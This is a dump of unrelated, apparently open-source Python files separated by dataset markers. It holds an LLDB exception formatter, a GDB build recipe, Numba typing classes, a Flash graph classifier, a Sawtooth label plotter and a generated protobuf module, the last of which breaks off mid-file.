LLDB AppKit formatters
part of The LLVM Compiler Infrastructure
This file is distributed under the University of Illinois Open Source
License. See LICENSE.TXT for details.
"""
# summary provider for class NSException
import lldb.runtime.objc.objc_runtime
import lldb.formatters.metrics
import CFString
import lldb
import lldb.formatters.Logger
statistics = lldb.formatters.metrics.Metrics()
statistics.add_metric('invalid_isa')
statistics.add_metric('invalid_pointer')
statistics.add_metric('unknown_class')
statistics.add_metric('code_notrun')
class NSKnownException_SummaryProvider:
def adjust_for_architecture(self):
pass
def __init__(self, valobj, params):
logger = lldb.formatters.Logger.Logger()
self.valobj = valobj
self.sys_params = params
if not (self.sys_params.types_cache.id):
self.sys_params.types_cache.id = self.valobj.GetType(
).GetBasicType(lldb.eBasicTypeObjCID)
self.update()
def update(self):
logger = lldb.formatters.Logger.Logger()
self.adjust_for_architecture()
def offset_name(self):
logger = lldb.formatters.Logger.Logger()
return self.sys_params.pointer_size
def offset_reason(self):
logger = lldb.formatters.Logger.Logger()
return 2 * self.sys_params.pointer_size
def description(self):
logger = lldb.formatters.Logger.Logger()
name_ptr = self.valobj.CreateChildAtOffset(
"name", self.offset_name(), self.sys_params.types_cache.id)
reason_ptr = self.valobj.CreateChildAtOffset(
"reason", self.offset_reason(), self.sys_params.types_cache.id)
return 'name:' + CFString.CFString_SummaryProvider(
name_ptr, None) + ' reason:' + CFString.CFString_SummaryProvider(reason_ptr, None)
class NSUnknownException_SummaryProvider:
def adjust_for_architecture(self):
pass
def __init__(self, valobj, params):
logger = lldb.formatters.Logger.Logger()
self.valobj = valobj
self.sys_params = params
self.update()
def update(self):
logger = lldb.formatters.Logger.Logger()
self.adjust_for_architecture()
def description(self):
logger = lldb.formatters.Logger.Logger()
stream = lldb.SBStream()
self.valobj.GetExpressionPath(stream)
name_vo = self.valobj.CreateValueFromExpression(
"name", "(NSString*)[" + stream.GetData() + " name]")
reason_vo = self.valobj.CreateValueFromExpression(
"reason", "(NSString*)[" + stream.GetData() + " reason]")
if name_vo.IsValid() and reason_vo.IsValid():
return CFString.CFString_SummaryProvider(
name_vo, None) + ' ' + CFString.CFString_SummaryProvider(reason_vo, None)
return '<variable is not NSException>'
def GetSummary_Impl(valobj):
logger = lldb.formatters.Logger.Logger()
global statistics
class_data, wrapper = lldb.runtime.objc.objc_runtime.Utilities.prepare_class_detection(
valobj, statistics)
if wrapper:
return wrapper
name_string = class_data.class_name()
logger >> "class name is: " + str(name_string)
if name_string == 'NSException':
wrapper = NSKnownException_SummaryProvider(
valobj, class_data.sys_params)
statistics.metric_hit('code_notrun', valobj)
else:
wrapper = NSUnknownException_SummaryProvider(
valobj, class_data.sys_params)
statistics.metric_hit(
'unknown_class',
valobj.GetName() +
" seen as " +
name_string)
return wrapper
def NSException_SummaryProvider(valobj, dict):
logger = lldb.formatters.Logger.Logger()
provider = GetSummary_Impl(valobj)
if provider is not None:
if isinstance(
provider,
lldb.runtime.objc.objc_runtime.SpecialSituation_Description):
return provider.message()
try:
summary = provider.description()
except:
summary = None
logger >> "got summary " + str(summary)
if summary is None:
summary = '<variable is not NSException>'
return str(summary)
return 'Summary Unavailable'
def __lldb_init_module(debugger, dict):
debugger.HandleCommand(
"type summary add -F NSException.NSException_SummaryProvider NSException")
| StarcoderdataPython |
1692240 | <reponame>stangelandcl/hardhat
from .base import GnuRecipe
class GdbRecipe(GnuRecipe):
def __init__(self, *args, **kwargs):
super(GdbRecipe, self).__init__(*args, **kwargs)
self.sha256 = '97dcc3169bd430270fc29adb65145846' \
'a58c1b55cdbb73382a4a89307bdad03c'
self.name = 'gdb'
self.version = '8.1.1'
self.url = 'http://ftp.gnu.org/gnu/gdb/gdb-$version.tar.xz'
self.depends = ['readline', 'zlib']
autoload = '$p/$t/lib:$p/$t/lib64:$p/lib:$p/lib64'.replace(
'$p', self.prefix_dir).replace('$t', self.target_triplet)
self.configure_args += [
'--with-system-readline',
'--with-system-zlib',
# Add path to load pthread db from for thread
# debugging
'--with-auto-load-dir=%s' % autoload,
'--with-auto-load-safe-path=%s' % autoload
]
| StarcoderdataPython |
31674 | import edits
from edits import PageEditor
pe = PageEditor(keyword='spider', orientation='block')
pe.edit() | StarcoderdataPython |
199199 | import traceback
from collections import namedtuple, defaultdict
import inspect
import itertools
import logging
import textwrap
from os import path
from shutil import get_terminal_size
from .abstract import Callable, DTypeSpec, Dummy, Literal, Type, weakref
from .common import Opaque
from .misc import unliteral
from numba.core import errors, utils, types, config
import numba
_logger = logging.getLogger(__name__)
# terminal color markup
_termcolor = errors.termcolor()
_FAILURE = namedtuple('_FAILURE', 'template matched error literal')
_termwidth = get_terminal_size().columns
# pull out the lead line as unit tests often use this
_header_lead = "No implementation of function"
_header_template = (_header_lead + " {the_function} found for signature:\n \n "
">>> {fname}({signature})\n \nThere are {ncandidates} "
"candidate implementations:")
_reason_template = """
" - Of which {nmatches} did not match due to:\n
"""
def _wrapper(tmp, indent=0):
return textwrap.indent(tmp, ' ' * indent, lambda line: True)
_overload_template = ("- Of which {nduplicates} did not match due to:\n"
"{kind} {inof} function '{function}': File: {file}: "
"Line {line}.\n With argument(s): '({args})':")
_err_reasons = {}
_err_reasons['specific_error'] = ("Rejected as the implementation raised a "
"specific error:\n{}")
def _bt_as_lines(bt):
"""
Converts a backtrace into a list of lines, squashes it a bit on the way.
"""
return [y for y in itertools.chain(*[x.split('\n') for x in bt]) if y]
def argsnkwargs_to_str(args, kwargs):
buf = [str(a) for a in tuple(args)]
buf.extend(["{}={}".format(k, v) for k, v in kwargs.items()])
return ', '.join(buf)
class _ResolutionFailures(object):
"""Collect and format function resolution failures.
"""
def __init__(self, context, function_type, args, kwargs, depth=0):
self._context = context
self._function_type = function_type
self._args = args
self._kwargs = kwargs
self._failures = defaultdict(list)
self._depth = depth
self._max_depth = 5
self._scale = 2
def __len__(self):
return len(self._failures)
def add_error(self, calltemplate, matched, error, literal):
"""
Args
----
calltemplate : CallTemplate
error : Exception or str
Error message
"""
isexc = isinstance(error, Exception)
errclazz = '%s: ' % type(error).__name__ if isexc else ''
key = "{}{}".format(errclazz, str(error))
self._failures[key].append(_FAILURE(calltemplate, matched, error,
literal))
def format(self):
"""Return a formatted error message from all the gathered errors.
"""
indent = ' ' * self._scale
argstr = argsnkwargs_to_str(self._args, self._kwargs)
ncandidates = sum([len(x) for x in self._failures.values()])
# sort out a display name for the function
tykey = self._function_type.typing_key
# most things have __name__
fname = getattr(tykey, '__name__', None)
is_external_fn_ptr = isinstance(self._function_type,
ExternalFunctionPointer)
if fname is None:
if is_external_fn_ptr:
fname = "ExternalFunctionPointer"
else:
fname = "<unknown function>"
msgbuf = [_header_template.format(the_function=self._function_type,
fname=fname,
signature=argstr,
ncandidates=ncandidates)]
nolitargs = tuple([unliteral(a) for a in self._args])
nolitkwargs = {k: unliteral(v) for k, v in self._kwargs.items()}
nolitargstr = argsnkwargs_to_str(nolitargs, nolitkwargs)
# depth could potentially get massive, so limit it.
ldepth = min(max(self._depth, 0), self._max_depth)
def template_info(tp):
src_info = tp.get_template_info()
unknown = "unknown"
source_name = src_info.get('name', unknown)
source_file = src_info.get('filename', unknown)
source_lines = src_info.get('lines', unknown)
source_kind = src_info.get('kind', 'Unknown template')
return source_name, source_file, source_lines, source_kind
for i, (k, err_list) in enumerate(self._failures.items()):
err = err_list[0]
nduplicates = len(err_list)
template, error = err.template, err.error
ifo = template_info(template)
source_name, source_file, source_lines, source_kind = ifo
largstr = argstr if err.literal else nolitargstr
if err.error == "No match.":
err_dict = defaultdict(set)
for errs in err_list:
err_dict[errs.template].add(errs.literal)
# if there's just one template, and it's erroring on
# literal/nonliteral be specific
if len(err_dict) == 1:
template = [_ for _ in err_dict.keys()][0]
source_name, source_file, source_lines, source_kind = \
template_info(template)
source_lines = source_lines[0]
else:
source_file = "<numerous>"
source_lines = "N/A"
msgbuf.append(_termcolor.errmsg(
_wrapper(_overload_template.format(nduplicates=nduplicates,
kind = source_kind.title(),
function=fname,
inof='of',
file=source_file,
line=source_lines,
args=largstr),
ldepth + 1)))
msgbuf.append(_termcolor.highlight(_wrapper(err.error,
ldepth + 2)))
else:
# There was at least one match in this failure class, but it
# failed for a specific reason try and report this.
msgbuf.append(_termcolor.errmsg(
_wrapper(_overload_template.format(nduplicates=nduplicates,
kind = source_kind.title(),
function=source_name,
inof='in',
file=source_file,
line=source_lines[0],
args=largstr),
ldepth + 1)))
if isinstance(error, BaseException):
reason = indent + self.format_error(error)
errstr = _err_reasons['specific_error'].format(reason)
else:
errstr = error
# if you are a developer, show the back traces
if config.DEVELOPER_MODE:
if isinstance(error, BaseException):
# if the error is an actual exception instance, trace it
bt = traceback.format_exception(type(error), error,
error.__traceback__)
else:
bt = [""]
bt_as_lines = _bt_as_lines(bt)
nd2indent = '\n{}'.format(2 * indent)
errstr += _termcolor.reset(nd2indent +
nd2indent.join(bt_as_lines))
msgbuf.append(_termcolor.highlight(_wrapper(errstr,
ldepth + 2)))
loc = self.get_loc(template, error)
if loc:
msgbuf.append('{}raised from {}'.format(indent, loc))
# the commented bit rewraps each block, may not be helpful?!
return _wrapper('\n'.join(msgbuf) + '\n') # , self._scale * ldepth)
def format_error(self, error):
"""Format error message or exception
"""
if isinstance(error, Exception):
return '{}: {}'.format(type(error).__name__, error)
else:
return '{}'.format(error)
def get_loc(self, classtemplate, error):
"""Get source location information from the error message.
"""
if isinstance(error, Exception) and hasattr(error, '__traceback__'):
# traceback is unavailable in py2
frame = traceback.extract_tb(error.__traceback__)[-1]
return "{}:{}".format(frame[0], frame[1])
def raise_error(self):
for faillist in self._failures.values():
for fail in faillist:
if isinstance(fail.error, errors.ForceLiteralArg):
raise fail.error
raise errors.TypingError(self.format())
class BaseFunction(Callable):
"""
Base type class for some function types.
"""
def __init__(self, template):
if isinstance(template, (list, tuple)):
self.templates = tuple(template)
keys = set(temp.key for temp in self.templates)
if len(keys) != 1:
raise ValueError("incompatible templates: keys = %s"
% (keys,))
self.typing_key, = keys
else:
self.templates = (template,)
self.typing_key = template.key
self._impl_keys = {}
name = "%s(%s)" % (self.__class__.__name__, self.typing_key)
self._depth = 0
super(BaseFunction, self).__init__(name)
@property
def key(self):
return self.typing_key, self.templates
def augment(self, other):
"""
Augment this function type with the other function types' templates,
so as to support more input types.
"""
if type(other) is type(self) and other.typing_key == self.typing_key:
return type(self)(self.templates + other.templates)
def get_impl_key(self, sig):
"""
Get the implementation key (used by the target context) for the
given signature.
"""
return self._impl_keys[sig.args]
def get_call_type(self, context, args, kws):
failures = _ResolutionFailures(context, self, args, kws,
depth=self._depth)
self._depth += 1
for temp_cls in self.templates:
temp = temp_cls(context)
for uselit in [True, False]:
try:
if uselit:
sig = temp.apply(args, kws)
else:
nolitargs = tuple([unliteral(a) for a in args])
nolitkws = {k: unliteral(v) for k, v in kws.items()}
sig = temp.apply(nolitargs, nolitkws)
except Exception as e:
sig = None
failures.add_error(temp, False, e, uselit)
else:
if sig is not None:
self._impl_keys[sig.args] = temp.get_impl_key(sig)
self._depth -= 1
return sig
else:
registered_sigs = getattr(temp, 'cases', None)
if registered_sigs is not None:
msg = "No match for registered cases:\n%s"
msg = msg % '\n'.join(" * {}".format(x) for x in
registered_sigs)
else:
msg = 'No match.'
failures.add_error(temp, True, msg, uselit)
if len(failures) == 0:
raise AssertionError("Internal Error. "
"Function resolution ended with no failures "
"or successful signature")
failures.raise_error()
def get_call_signatures(self):
sigs = []
is_param = False
for temp in self.templates:
sigs += getattr(temp, 'cases', [])
is_param = is_param or hasattr(temp, 'generic')
return sigs, is_param
class Function(BaseFunction, Opaque):
"""
Type class for builtin functions implemented by Numba.
"""
class BoundFunction(Callable, Opaque):
"""
A function with an implicit first argument (denoted as *this* below).
"""
def __init__(self, template, this):
# Create a derived template with an attribute *this*
newcls = type(template.__name__ + '.' + str(this), (template,),
dict(this=this))
self.template = newcls
self.typing_key = self.template.key
self.this = this
name = "%s(%s for %s)" % (self.__class__.__name__,
self.typing_key, self.this)
super(BoundFunction, self).__init__(name)
def unify(self, typingctx, other):
if (isinstance(other, BoundFunction) and
self.typing_key == other.typing_key):
this = typingctx.unify_pairs(self.this, other.this)
if this is not None:
# XXX is it right that both template instances are distinct?
return self.copy(this=this)
def copy(self, this):
return type(self)(self.template, this)
@property
def key(self):
return self.typing_key, self.this
def get_impl_key(self, sig):
"""
Get the implementation key (used by the target context) for the
given signature.
"""
return self.typing_key
def get_call_type(self, context, args, kws):
template = self.template(context)
literal_e = None
nonliteral_e = None
# Try with Literal
try:
out = template.apply(args, kws)
except Exception as exc:
if isinstance(exc, errors.ForceLiteralArg):
raise exc
literal_e = exc
out = None
# if the unliteral_args and unliteral_kws are the same as the literal
# ones, set up to not bother retrying
unliteral_args = tuple([unliteral(a) for a in args])
unliteral_kws = {k: unliteral(v) for k, v in kws.items()}
skip = unliteral_args == args and kws == unliteral_kws
# If the above template application failed and the non-literal args are
# different to the literal ones, try again with literals rewritten as
# non-literals
if not skip and out is None:
try:
out = template.apply(unliteral_args, unliteral_kws)
except Exception as exc:
if isinstance(exc, errors.ForceLiteralArg):
raise exc
nonliteral_e = exc
if out is None and (nonliteral_e is not None or literal_e is not None):
header = "- Resolution failure for {} arguments:\n{}\n"
tmplt = _termcolor.highlight(header)
if config.DEVELOPER_MODE:
indent = ' ' * 4
def add_bt(error):
if isinstance(error, BaseException):
# if the error is an actual exception instance, trace it
bt = traceback.format_exception(type(error), error,
error.__traceback__)
else:
bt = [""]
nd2indent = '\n{}'.format(2 * indent)
errstr = _termcolor.reset(nd2indent +
nd2indent.join(_bt_as_lines(bt)))
return _termcolor.reset(errstr)
else:
add_bt = lambda X: ''
def nested_msg(literalness, e):
estr = str(e)
estr = estr if estr else (str(repr(e)) + add_bt(e))
new_e = errors.TypingError(textwrap.dedent(estr))
return tmplt.format(literalness, str(new_e))
raise errors.TypingError(nested_msg('literal', literal_e) +
nested_msg('non-literal', nonliteral_e))
return out
def get_call_signatures(self):
sigs = getattr(self.template, 'cases', [])
is_param = hasattr(self.template, 'generic')
return sigs, is_param
class MakeFunctionLiteral(Literal, Opaque):
pass
class WeakType(Type):
"""
Base class for types parametered by a mortal object, to which only
a weak reference is kept.
"""
def _store_object(self, obj):
self._wr = weakref.ref(obj)
def _get_object(self):
obj = self._wr()
if obj is None:
raise ReferenceError("underlying object has vanished")
return obj
@property
def key(self):
return self._wr
def __eq__(self, other):
if type(self) is type(other):
obj = self._wr()
return obj is not None and obj is other._wr()
return NotImplemented
def __hash__(self):
return Type.__hash__(self)
class Dispatcher(WeakType, Callable, Dummy):
"""
Type class for @jit-compiled functions.
"""
def __init__(self, dispatcher):
self._store_object(dispatcher)
super(Dispatcher, self).__init__("type(%s)" % dispatcher)
def dump(self, tab=''):
print(f'{tab}DUMP {type(self).__name__}[code={self._code}, name={self.name}]')
self.dispatcher.dump(tab=tab + ' ')
print(f'{tab}END DUMP')
def get_call_type(self, context, args, kws):
"""
Resolve a call to this dispatcher using the given argument types.
A signature returned and it is ensured that a compiled specialization
is available for it.
"""
template, pysig, args, kws = self.dispatcher.get_call_template(args, kws)
sig = template(context).apply(args, kws)
if sig:
sig = sig.replace(pysig=pysig)
return sig
def get_call_signatures(self):
sigs = self.dispatcher.nopython_signatures
return sigs, True
@property
def dispatcher(self):
"""
A strong reference to the underlying numba.dispatcher.Dispatcher instance.
"""
return self._get_object()
def get_overload(self, sig):
"""
Get the compiled overload for the given signature.
"""
return self.dispatcher.get_overload(sig.args)
def get_impl_key(self, sig):
"""
Get the implementation key for the given signature.
"""
return self.get_overload(sig)
def unify(self, context, other):
return utils.unified_function_type((self, other), require_precise=False)
class ObjModeDispatcher(Dispatcher):
"""Dispatcher subclass that enters objectmode function.
"""
pass
class ExternalFunctionPointer(BaseFunction):
"""
A pointer to a native function (e.g. exported via ctypes or cffi).
*get_pointer* is a Python function taking an object
and returning the raw pointer value as an int.
"""
def __init__(self, sig, get_pointer, cconv=None):
from numba.core.typing.templates import (AbstractTemplate,
make_concrete_template,
signature)
from numba.core.types import ffi_forced_object
if sig.return_type == ffi_forced_object:
raise TypeError("Cannot return a pyobject from a external function")
self.sig = sig
self.requires_gil = any(a == ffi_forced_object for a in self.sig.args)
self.get_pointer = get_pointer
self.cconv = cconv
if self.requires_gil:
class GilRequiringDefn(AbstractTemplate):
key = self.sig
def generic(self, args, kws):
if kws:
raise TypeError("does not support keyword arguments")
# Make ffi_forced_object a bottom type to allow any type to be
# casted to it. This is the only place that support
# ffi_forced_object.
coerced = [actual if formal == ffi_forced_object else formal
for actual, formal
in zip(args, self.key.args)]
return signature(self.key.return_type, *coerced)
template = GilRequiringDefn
else:
template = make_concrete_template("CFuncPtr", sig, [sig])
super(ExternalFunctionPointer, self).__init__(template)
@property
def key(self):
return self.sig, self.cconv, self.get_pointer
class ExternalFunction(Function):
"""
A named native function (resolvable by LLVM) accepting an explicit signature.
For internal use only.
"""
def __init__(self, symbol, sig):
from numba.core import typing
self.symbol = symbol
self.sig = sig
template = typing.make_concrete_template(symbol, symbol, [sig])
super(ExternalFunction, self).__init__(template)
@property
def key(self):
return self.symbol, self.sig
class NamedTupleClass(Callable, Opaque):
"""
Type class for namedtuple classes.
"""
def __init__(self, instance_class):
self.instance_class = instance_class
name = "class(%s)" % (instance_class)
super(NamedTupleClass, self).__init__(name)
def get_call_type(self, context, args, kws):
# Overridden by the __call__ constructor resolution in typing.collections
return None
def get_call_signatures(self):
return (), True
@property
def key(self):
return self.instance_class
class NumberClass(Callable, DTypeSpec, Opaque):
"""
Type class for number classes (e.g. "np.float64").
"""
def __init__(self, instance_type):
self.instance_type = instance_type
name = "class(%s)" % (instance_type,)
super(NumberClass, self).__init__(name)
def get_call_type(self, context, args, kws):
# Overridden by the __call__ constructor resolution in typing.builtins
return None
def get_call_signatures(self):
return (), True
@property
def key(self):
return self.instance_type
@property
def dtype(self):
return self.instance_type
class RecursiveCall(Opaque):
"""
Recursive call to a Dispatcher.
"""
_overloads = None
def __init__(self, dispatcher_type):
assert isinstance(dispatcher_type, Dispatcher)
self.dispatcher_type = dispatcher_type
name = "recursive(%s)" % (dispatcher_type,)
super(RecursiveCall, self).__init__(name)
# Initializing for the first time
if self._overloads is None:
self._overloads = {}
@property
def overloads(self):
return self._overloads
@property
def key(self):
return self.dispatcher_type
| StarcoderdataPython |
4837953 | <filename>flash/graph/classification/model.py
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Any, Callable, Dict, List, Optional, Tuple, Union
import torch
from torch import nn
from torch.nn import functional as F
from torch.nn import Linear
from flash.core.classification import ClassificationTask
from flash.core.data.io.input import DataKeys
from flash.core.registry import FlashRegistry
from flash.core.utilities.imports import _GRAPH_AVAILABLE
from flash.core.utilities.types import LOSS_FN_TYPE, LR_SCHEDULER_TYPE, METRICS_TYPE, OPTIMIZER_TYPE
from flash.graph.backbones import GRAPH_BACKBONES
from flash.graph.collate import _pyg_collate
if _GRAPH_AVAILABLE:
from torch_geometric.nn import global_add_pool, global_max_pool, global_mean_pool
POOLING_FUNCTIONS = {"mean": global_mean_pool, "add": global_add_pool, "max": global_max_pool}
else:
POOLING_FUNCTIONS = {}
class GraphClassifier(ClassificationTask):
"""The ``GraphClassifier`` is a :class:`~flash.Task` for classifying graphs. For more details, see
:ref:`graph_classification`.
Args:
num_features (int): The number of features in the input.
num_classes (int): Number of classes to classify.
backbone: Name of the backbone to use.
backbone_kwargs: Dictionary dependent on the backbone, containing for example in_channels, out_channels,
hidden_channels or depth (number of layers).
pooling_fn: The global pooling operation to use (one of: "max", "max", "add" or a callable).
head: The head to use.
loss_fn: Loss function for training, defaults to cross entropy.
learning_rate: Learning rate to use for training.
optimizer: Optimizer to use for training.
lr_scheduler: The LR scheduler to use during training.
metrics: Metrics to compute for training and evaluation.
"""
backbones: FlashRegistry = GRAPH_BACKBONES
required_extras: str = "graph"
def __init__(
self,
num_features: int,
num_classes: Optional[int] = None,
labels: Optional[List[str]] = None,
backbone: Union[str, Tuple[nn.Module, int]] = "GCN",
backbone_kwargs: Optional[Dict] = {},
pooling_fn: Optional[Union[str, Callable]] = "mean",
head: Optional[Union[Callable, nn.Module]] = None,
loss_fn: LOSS_FN_TYPE = F.cross_entropy,
learning_rate: Optional[float] = None,
optimizer: OPTIMIZER_TYPE = "Adam",
lr_scheduler: LR_SCHEDULER_TYPE = None,
metrics: METRICS_TYPE = None,
):
self.save_hyperparameters()
if labels is not None and num_classes is None:
num_classes = len(labels)
super().__init__(
loss_fn=loss_fn,
optimizer=optimizer,
lr_scheduler=lr_scheduler,
metrics=metrics,
learning_rate=learning_rate,
num_classes=num_classes,
labels=labels,
)
self.save_hyperparameters()
if isinstance(backbone, tuple):
self.backbone, num_out_features = backbone
else:
self.backbone = self.backbones.get(backbone)(in_channels=num_features, **backbone_kwargs)
num_out_features = self.backbone.hidden_channels
self.pooling_fn = POOLING_FUNCTIONS[pooling_fn] if isinstance(pooling_fn, str) else pooling_fn
if head is not None:
self.head = head
else:
self.head = DefaultGraphHead(num_out_features, num_classes)
self.collate_fn = _pyg_collate
def training_step(self, batch: Any, batch_idx: int) -> Any:
batch = (batch[DataKeys.INPUT], batch[DataKeys.TARGET])
return super().training_step(batch, batch_idx)
def validation_step(self, batch: Any, batch_idx: int) -> Any:
batch = (batch[DataKeys.INPUT], batch[DataKeys.TARGET])
return super().validation_step(batch, batch_idx)
def test_step(self, batch: Any, batch_idx: int) -> Any:
batch = (batch[DataKeys.INPUT], batch[DataKeys.TARGET])
return super().test_step(batch, batch_idx)
def predict_step(self, batch: Any, batch_idx: int, dataloader_idx: int = 0) -> Any:
return super().predict_step(batch[DataKeys.INPUT], batch_idx, dataloader_idx=dataloader_idx)
def forward(self, data) -> torch.Tensor:
x = self.backbone(data.x, data.edge_index)
x = self.pooling_fn(x, data.batch)
return self.head(x)
class DefaultGraphHead(torch.nn.Module):
def __init__(self, hidden_channels, num_classes, dropout=0.5):
super().__init__()
self.lin1 = Linear(hidden_channels, hidden_channels)
self.lin2 = Linear(hidden_channels, num_classes)
self.dropout = dropout
def reset_parameters(self):
self.lin1.reset_parameters()
self.lin2.reset_parameters()
def forward(self, x):
x = F.relu(self.lin1(x))
x = F.dropout(x, p=self.dropout, training=self.training)
return self.lin2(x)
| StarcoderdataPython |
41451 | <filename>tools/visualize-sawtooth-label.py<gh_stars>0
#!/usr/bin/python3.6
import numpy as np
import csv
import argparse
import matplotlib.pyplot as plt
import sys
import os
####################################
# Sawtooth crash labels visualizer #
####################################
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Sawtooth crash labels visualizer")
parser.add_argument("-i", "--sht-file", dest="sht_file", required=True,
help="path to a valid `tgraph.cfg` file")
parser.add_argument("-l", "--labels", dest="labels_file", required=True,
help="path to output directory (will be created if not exists)")
args = parser.parse_args()
from base import get_globus_version
current_dir = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.join(current_dir, "..", "_stage-%s" % get_globus_version(), "python"))
import pyglobus
sht_reader = pyglobus.util.ShtReader(args.sht_file)
with open(args.labels_file, "r") as f:
reader = csv.reader(f)
# Skip header
next(reader)
for row in reader:
num_signal = int(row[0])
start_ind = int(row[1])
end_ind = int(row[2])
signal = sht_reader.get_signal(num_signal)
x = signal.get_data_x()
y = signal.get_data_y()
plt.plot(x, y)
plt.axvline(x[start_ind], color="r")
plt.axvline(x[end_ind], color="r")
plt.show()
| StarcoderdataPython |
139563 | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: persistent_volume_claim.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='persistent_volume_claim.proto',
package='container',
syntax='proto3',
serialized_options=_b('ZCgo.easyops.local/contracts/protorepo-models/easyops/model/container'),
serialized_pb=_b('\n\x1dpersistent_volume_claim.proto\x12\tcontainer\"\x84\x02\n\x15PersistentVolumeClaim\x12\x12\n\ninstanceId\x18\x01 \x01(\t\x12\x0c\n\x04kind\x18\x02 \x01(\t\x12\x0c\n\x04name\x18\x03 \x01(\t\x12\x14\n\x0cresourceName\x18\x04 \x01(\t\x12\x14\n\x0cresourceSpec\x18\x05 \x01(\t\x12\x0f\n\x07storage\x18\x06 \x01(\t\x12\x13\n\x0b\x61\x63\x63\x65ssModes\x18\x07 \x03(\t\x12\x11\n\tnamespace\x18\x08 \x01(\t\x12\x14\n\x0cstorageClass\x18\t \x01(\t\x12\x16\n\x0estorageClassId\x18\n \x01(\t\x12\x19\n\x11\x63reationTimestamp\x18\x0b \x01(\t\x12\r\n\x05phase\x18\x0c \x01(\tBEZCgo.easyops.local/contracts/protorepo-models/easyops/model/containerb\x06proto3')
)
_PERSISTENTVOLUMECLAIM = _descriptor.Descriptor(
name='PersistentVolumeClaim',
full_name='container.PersistentVolumeClaim',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='instanceId', full_name='container.PersistentVolumeClaim.instanceId', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='kind', full_name='container.PersistentVolumeClaim.kind', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='name', full_name='container.PersistentVolumeClaim.name', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='resourceName', full_name='container.PersistentVolumeClaim.resourceName', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='resourceSpec', full_name='container.PersistentVolumeClaim.resourceSpec', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='storage', full_name='container.PersistentVolumeClaim.storage', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='accessModes', full_name='container.PersistentVolumeClaim.accessModes', index=6,
number=7, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='namespace', full_name='container.PersistentVolumeClaim.namespace', index=7,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='storageClass', full_name='container.PersistentVolumeClaim.storageClass', index=8,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='storageClassId', full_name='container.PersistentVolumeClaim.storageClassId', index=9,
number=10, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='creationTimestamp', full_name='container.PersistentVolumeClaim.creationTimestamp', index=10,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='phase', full_name='container.PersistentVolumeClaim.phase', index=11,
number=12, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=45,
serialized_end=305,
)
DESCRIPTOR.message_types_by_name['PersistentVolumeClaim'] = _PERSISTENTVOLUMECLAIM
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
PersistentVolumeClaim = _reflection.GeneratedProtocolMessageType('PersistentVolumeClaim', (_message.Message,), {
'DESCRIPTOR' : _PERSISTENTVOLUMECLAIM,
'__module__' : 'persistent_volume_claim_pb2'
